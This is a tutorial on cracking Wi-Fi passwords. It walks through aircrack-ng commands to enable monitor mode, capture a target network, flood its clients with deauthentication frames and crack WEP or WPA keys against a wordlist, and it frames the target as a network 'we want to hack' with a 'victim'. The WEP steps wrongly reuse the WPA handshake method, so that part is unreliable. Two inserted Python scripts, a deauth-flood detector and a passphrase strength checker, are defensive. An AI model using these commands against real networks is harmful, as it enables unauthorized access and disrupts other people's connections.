HOW TO HACK PASSWORDS FROM Wi-Fi USING WEP AND WPA

What is Wireless?

The word wireless is defined in the dictionary as "having no wires". In networking terminology, wireless describes any computer network in which there is no physical wired connection between sender and receiver; instead the network is connected by radio waves and/or microwaves to maintain communications. Wireless networking uses specific equipment such as NICs, APs and routers in place of wires (copper or optical fibre) for connectivity.

Wireless technology started in the early 20th century with radiotelegraphy using Morse code. When modulation was introduced, it became possible to transmit voice, music and other sounds wirelessly, and this medium came to be known as radio. As demand for data communication grew, a larger portion of the wireless spectrum was needed, and the term wireless came into widespread use.

When the word wireless is mentioned, people most often mean wireless computer networking, as in Wi-Fi, or cellular telephony, which is the backbone of personal communications.

Common everyday wireless technologies include:

  • 802.11 Wi-Fi: Wireless networking technology for personal computers
  • Bluetooth: Technology for interconnecting small devices
  • Global System for Mobile Communication (GSM): De facto mobile phone standard in many countries
  • Two-Way Radio: Radio communications, as in amateur and citizen band radio services, as well as business and military communications

What is Penetration Testing?

A penetration test, also known as a pen test, is a simulated cyberattack against your computer system to check for exploitable vulnerabilities. In the context of web application security, penetration testing is commonly used to augment a web application firewall.

Pen testing can involve attempting to breach any number of application systems (e.g., application programming interfaces (APIs), frontend/backend servers) to uncover vulnerabilities such as unsanitised inputs that are susceptible to code injection attacks.

Insights provided by the penetration test can be used to fine-tune your WAF security policies and patch detected vulnerabilities.

Phases of Penetration Testing

[Figure: Penetration Testing Phases]

What is Wireless Penetration Testing?

Wireless penetration testing actively examines the information security measures in place on wireless networks and analyses their weaknesses, technical flaws and critical wireless vulnerabilities.

The most important countermeasures to focus on are threat assessment, data theft detection, security control auditing, risk prevention and detection, information system management and infrastructure upgrades; a detailed report should be prepared at the end.

WEP (Wired Equivalent Privacy)

Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE Wireless Fidelity (Wi-Fi) standard, 802.11b, that is designed to provide a wireless local area network (WLAN) with a level of security and privacy comparable to what is usually expected of a wired LAN. A wired local area network (LAN) is generally protected by physical security mechanisms (controlled access to a building, for example) that are effective for a controlled physical environment, but may be ineffective for WLANs because radio waves are not necessarily bound by the walls containing the network. WEP seeks to establish similar protection to that offered by the wired network’s physical security measures by encrypting data transmitted over the WLAN. Data encryption protects the vulnerable wireless link between clients and access points; once this measure has been taken, other typical LAN security mechanisms such as password protection, end-to-end encryption, virtual private networks (VPNs), and authentication can be put in place to ensure privacy.

Step 1: Check the wireless adapter connected to the system

Open a terminal and type the following command and hit enter as shown in the figure below.

#iwconfig

Step 2: Putting the adapter into monitor mode

Open a terminal and type the following command and hit enter as shown in the figure below.

#airmon-ng start wlan0

[Figure: airmon-ng start wlan0]

Step 3: Searching for access points around you

Open a terminal and type the following command and hit enter as shown in the figure below.

#airodump-ng wlan0mon

[Figure: airodump-ng]

Step 4: Capturing packets from the selected access point

Now let's capture packets from the Wi-Fi network we want to hack. Type the following command to do so.

# airodump-ng --bssid 7C:8B:CA:46:B2:F9 -c 4 -w my1 wlan0mon

[Figure: airodump-ng for a particular BSSID]

After that, the capture is stored in the file my1-01.cap.

Step 5: Deauthentication packets to request a handshake

Open a terminal and type the following command and hit enter as shown in the figure below.

#aireplay-ng -0 0 -a 7C:8B:CA:46:B2:F9 wlan0mon

[Figure: aireplay-ng]

After 2 or 3 minutes, stop it so that the victim re-authenticates.

Step 6: Cracking the password using aircrack-ng

Open a terminal and type the following command and hit enter as shown in the figure below.

# aircrack-ng '/root/Desktop/my1-01.cap'

[Figure: aircrack-ng]

We have successfully cracked the password.

WPA (Wi-Fi Protected Access)

Wi-Fi Protected Access (WPA), Wi-Fi Protected Access II (WPA2), and Wi-Fi Protected Access 3 (WPA3) are three security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP).

Differences between WPA, WPA2 and WPA3

WPA

The Wi-Fi Alliance intended WPA as an intermediate measure to take the place of WEP pending the availability of the full IEEE 802.11i standard. WPA could be implemented through firmware upgrades on wireless network interface cards designed for WEP that began shipping as far back as 1999. However, since the changes required in the wireless access points (APs) were more extensive than those needed on the network cards, most pre-2003 APs could not be upgraded to support WPA.

The WPA protocol implements much of the IEEE 802.11i standard. Specifically, the Temporal Key Integrity Protocol (TKIP) was adopted for WPA. WEP used a 64-bit or 128-bit encryption key that must be manually entered on wireless access points and devices and does not change. TKIP employs a per-packet key, meaning that it dynamically generates a new 128-bit key for each packet and thus prevents the types of attacks that compromised WEP.

WPA2

WPA2 replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it includes mandatory support for CCMP, an AES-based encryption mode. Certification began in September 2004; from March 13, 2006, WPA2 certification has been mandatory for all new devices that bear the Wi-Fi trademark.

WPA3

In January 2018, the Wi-Fi Alliance announced WPA3 as a replacement for WPA2. The new standard uses 128-bit encryption in WPA3-Personal mode (192-bit in WPA3-Enterprise) and provides forward secrecy. WPA3 also replaces the Pre-Shared Key exchange with Simultaneous Authentication of Equals, as defined in IEEE 802.11-2016, resulting in a more secure initial key exchange in personal mode. The Wi-Fi Alliance also claims that WPA3 will mitigate the security issues posed by weak passwords and simplify the process of setting up devices that have no display interface.

Step 1: Check the wireless adapter connected to the system

Open a terminal and type the following command and hit enter as shown in the figure below.

#iwconfig

[Figure: iwconfig]

Step 2: Putting the adapter into monitor mode

Open a terminal and type the following command and hit enter as shown in the figure below.

#airmon-ng start wlan0

[Figure: airmon-ng]

Step 3: Searching for access points around you

Open a terminal and type the following command and hit enter as shown in the figure below.

#airodump-ng wlan0mon

[Figure: airodump-ng]

Select the target and copy its BSSID.

Step 4: Capturing packets from the selected access point

Now let's capture packets from the Wi-Fi network we want to hack. Type the following command to do so.

# airodump-ng --bssid 7C:8B:CA:46:B2:F9 -c 4 -w my1 wlan0mon

[Figure: airodump-ng]

After that, the capture is stored in the file my1-01.cap.

[Figure: the .cap file]

Step 5: Deauthentication packets to request a handshake

Open a terminal and type the following command and hit enter as shown in the figure below.

#aireplay-ng -0 0 -a 7C:8B:CA:46:B2:F9 wlan0mon

[Figure: aireplay-ng]

After 2 or 3 minutes, stop it so that the victim reconnects.
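From the defender's side, the deauthentication step used in both the WEP and WPA walkthroughs above is also the noisiest part of the procedure and the easiest to spot in a monitor-mode capture: a burst of deauthentication frames carrying the AP's BSSID as source and the broadcast address as destination. The Python script below is an added example, not part of the original post and not aircrack-ng project code, that flags such a burst from a list of frame records. The frame records are constructed for the example (the BSSID is the one used in the post; the traffic pattern is made up), and the threshold and window sizes are assumed values that would be tuned per network. Where both the AP and the clients support 802.11w Protected Management Frames (mandatory in WPA3), unauthenticated deauthentication frames of this kind are rejected by the client.

```python
from collections import defaultdict, deque

BROADCAST = "FF:FF:FF:FF:FF:FF"
AP = "7C:8B:CA:46:B2:F9"   # BSSID from the post

# Constructed sample capture: (timestamp_seconds, subtype, source_mac, destination_mac).
# In practice these records would come from a monitor-mode capture parsed with a
# tool such as tshark, or from a WIDS sensor (assumption: the field layout is ours).
SAMPLE_FRAMES = (
    [(i * 0.1024, "beacon", AP, BROADCAST) for i in range(30)]        # normal beacons
    + [(0.7, "deauth", "00:11:22:33:44:55", AP)]                       # one legitimate deauth: a client leaving
    + [(1.0 + i * 0.02, "deauth", AP, BROADCAST) for i in range(40)]  # burst: 40 deauths in 0.8 s
)


def detect_deauth_flood(frames, threshold=10, window=1.0):
    """Flag every source address that sends `threshold` or more deauthentication
    frames within any `window`-second span. Returns one alert dict per flagged
    source, recorded at the moment the threshold is first crossed."""
    recent = defaultdict(deque)   # per-source sliding window of (timestamp, destination)
    alerts = {}
    for ts, subtype, src, dst in sorted(frames, key=lambda f: f[0]):
        if subtype != "deauth":
            continue
        q = recent[src]
        q.append((ts, dst))
        # Drop frames that have fallen out of the sliding window.
        while q and ts - q[0][0] > window:
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = {
                "source": src,
                "window_start": q[0][0],
                "count": len(q),
                # A broadcast destination means every client of the AP is being kicked.
                "broadcast": any(d == BROADCAST for _, d in q),
            }
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_FRAMES):
        print(f"deauth flood from {alert['source']} starting at t={alert['window_start']:.2f}s "
              f"({alert['count']} frames in window, broadcast={alert['broadcast']})")
```

The single legitimate deauthentication frame from the client never reaches the threshold, so only the 40-frame burst produces an alert. A real sensor would also record the reason code carried in each frame and the channel, and would raise the threshold on busy networks where clients legitimately roam.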

Step 6: Cracking the password using aircrack-ng

Use aircrack-ng together with a dictionary wordlist to crack the password.

[Figure: dictionary for the attack]

Open a terminal and type the following command and hit enter as shown in the figure below.

# aircrack-ng -w '/root/Desktop/wordlist' '/root/Desktop/my1-01.cap'

We have successfully cracked the password.
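Step 6 only succeeds when the pre-shared key appears in the wordlist, so the mitigation is entirely in the hands of whoever chooses the passphrase. The script below is an added example, not part of the original post and not aircrack-ng project code, of the kind of passphrase policy check a network owner can run before deploying a WPA/WPA2 PSK: it applies the 802.11i passphrase limits (8 to 63 printable ASCII characters), a configurable minimum length, a lookup against a wordlist after stripping trailing digits/punctuation and undoing common letter-for-symbol substitutions, and a rough entropy estimate. The `check_psk` function name, the thresholds and the tiny `COMMON_WORDS` list are assumptions for the example; a real deployment would load a large wordlist of the kind used in Step 6.

```python
import math
import string

# Constructed mini wordlist standing in for an attacker's dictionary (assumption).
COMMON_WORDS = {"password", "letmein", "welcome", "qwerty", "wireless", "internet", "admin"}

# Undo common substitutions (0->o, 1->l, 3->e, 4->a, 5->s, 7->t, @->a, $->s, !->i)
# so that "p@ssw0rd" is recognised as "password" during the wordlist lookup.
_LEET = str.maketrans("013457@$!", "oleastasi")

# 802.11i passphrases are printable ASCII; exclude the whitespace control characters.
_ALLOWED = set(string.printable) - set("\t\n\r\x0b\x0c")


def _normalise(passphrase):
    """Lower-case, strip a trailing run of digits/punctuation, and undo leet spelling."""
    base = passphrase.lower().rstrip(string.digits + string.punctuation)
    return base, base.translate(_LEET)


def estimate_entropy_bits(passphrase):
    """Crude upper bound: length * log2(size of the character pool actually used).
    It over-estimates structured passphrases, so it is a floor check, not a guarantee."""
    pool = 0
    if any(c.islower() for c in passphrase):
        pool += 26
    if any(c.isupper() for c in passphrase):
        pool += 26
    if any(c.isdigit() for c in passphrase):
        pool += 10
    if any(c in string.punctuation or c == " " for c in passphrase):
        pool += 33
    return len(passphrase) * math.log2(pool) if pool else 0.0


def check_psk(passphrase, wordlist=COMMON_WORDS, min_length=16, min_bits=64):
    """Return a list of policy failure tags; an empty list means the passphrase passes."""
    problems = []
    if not all(c in _ALLOWED for c in passphrase):
        problems.append("nonprintable")     # 802.11i: printable ASCII only
    if not 8 <= len(passphrase) <= 63:
        problems.append("length_range")     # 802.11i: 8..63 characters
    if len(passphrase) < min_length:
        problems.append("too_short")        # local policy (assumed value)
    base, deleeted = _normalise(passphrase)
    if base in wordlist or deleeted in wordlist:
        problems.append("dictionary")       # would fall to the Step 6 wordlist attack
    if estimate_entropy_bits(passphrase) < min_bits:
        problems.append("low_entropy")
    return problems


if __name__ == "__main__":
    for candidate in ("password123", "p@ssw0rd2019!", "Xk7#pLq2!vR9mT4&wZ"):
        print(f"{candidate!r}: {check_psk(candidate) or 'OK'}")
```

The dictionary check is deliberately applied after normalisation: a trailing year or exclamation mark and a handful of symbol substitutions do not take a passphrase out of the reach of a wordlist attack, so the policy should not treat them as adding strength. The entropy estimate is only a lower bar; a long random passphrase, or a WPA3/SAE deployment, is what actually removes the offline-dictionary risk.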
